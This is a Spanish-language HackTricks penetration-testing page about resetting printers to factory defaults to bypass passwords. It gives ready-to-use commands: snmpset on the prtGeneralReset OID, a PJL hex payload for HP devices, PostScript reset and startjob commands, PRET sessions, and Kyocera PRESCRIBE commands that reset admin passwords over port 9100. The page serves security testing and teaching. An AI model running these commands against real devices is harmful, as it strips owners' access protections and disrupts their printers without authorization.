7.1 KiB
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o sigue a Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub de HackTricks y HackTricks Cloud.
Restablecer un dispositivo a los valores de fábrica es una funcionalidad crítica de seguridad ya que sobrescribe mecanismos de protección como contraseñas establecidas por el usuario. Esto generalmente se puede hacer presionando una combinación especial de teclas en el panel de control de la impresora. Realizar tal restablecimiento en frío solo toma segundos y, por lo tanto, es un escenario realista para atacantes locales o pentesters, que pueden, por ejemplo, colarse en la sala de copiado a la hora del almuerzo. Sin embargo, el acceso físico al dispositivo no siempre es una opción.
SNMP
El Printer-MIB define el objeto prtGeneralReset (OID 1.3.6.1.2.1.43.5.1.1.3.1) que permite a un atacante reiniciar el dispositivo (powerCycleReset(4)), restablecer la configuración de NVRAM (resetToNVRAM(5)) o restaurar los valores de fábrica (resetToFactoryDefaults(6)) utilizando SNMP. Esta característica/ataque es compatible con una gran variedad de impresoras y elimina todos los mecanismos de protección como contraseñas establecidas por el usuario para el servidor web integrado. Aunque los mecanismos de protección pueden ser eludidos eficientemente, una desventaja práctica de este enfoque es que toda la configuración de dirección IP estática se perderá. Si no hay servicio DHCP disponible, el atacante no podrá reconectarse al dispositivo después de restablecerlo a los valores de fábrica.
Restablecer el dispositivo a los valores de fábrica por defecto se puede lograr utilizando el comando snmpset
como se muestra a continuación (necesitas conocer la cadena de comunidad, por defecto en la mayoría de los casos es public
):
snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6
PML/PJL
En muchos escenarios, un atacante no tiene la capacidad de realizar solicitudes SNMP debido a firewalls o cadenas de comunidad SNMP desconocidas. Sin embargo, en dispositivos HP, SNMP puede transformarse en su representación PML e incorporar la solicitud dentro de un trabajo de impresión legítimo. Esto permite que un atacante reinicie y/o restablezca el dispositivo a los valores de fábrica dentro de trabajos de impresión ordinarios como se muestra a continuación:
@PJL DMCMD ASCIIHEX="040006020501010301040106"
Cualquiera puede reproducir este ataque en impresoras HP, reiniciar o restablecer el dispositivo se puede reproducir fácilmente usando PRET:
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> reset
printer:/> restart
PostScript
PostScript ofrece una característica similar: El parámetro del sistema FactoryDefaults, 'una bandera que, si se establece en verdadero inmediatamente antes de que la impresora se apague, hace que todos los parámetros no volátiles vuelvan a sus valores predeterminados de fábrica en el próximo encendido'. Cabe destacar que PostScript también tiene la capacidad de reiniciar su entorno, pero requiere una contraseña válida.
Sin embargo, el intérprete de PostScript puede entrar en un bucle infinito, como se discute en ataques DoS de procesamiento de documentos, lo que obliga al usuario a reiniciar manualmente el dispositivo y, por lo tanto, restablecer la contraseña de PostScript.
Restablecer los parámetros del sistema PostScript a los valores predeterminados de fábrica:
<< /FactoryDefaults true >> setsystemparams
Reiniciar el intérprete de PostScript y la memoria virtual:
true 0 startjob systemdict /quit get exec
Cualquiera puede reiniciar o restablecer el intérprete PostScript de una impresora, lo cual puede reproducirse fácilmente utilizando PRET:
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> reset
printer:/> restart
PRESCRIBE
Para dispositivos Kyocera, los lenguajes de descripción de página PRESCRIBE pueden usarse para restablecer el dispositivo a los valores de fábrica desde trabajos de impresión ordinarios utilizando uno de los comandos mostrados a continuación:
!R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password";
!R! ACNT "REST"; CMMT "Reset account code admin password";
!R! EGRE; CMMT "Reset the engine board to factory defaults";
!R! SIOP0,"RESET:0"; CMMT "Reset configuration settings";
Para reproducir este ataque, abre una conexión de red cruda al puerto 9100/tcp de la impresora y envía los comandos documentados arriba.
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o sigue a Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub de HackTricks y HackTricks Cloud.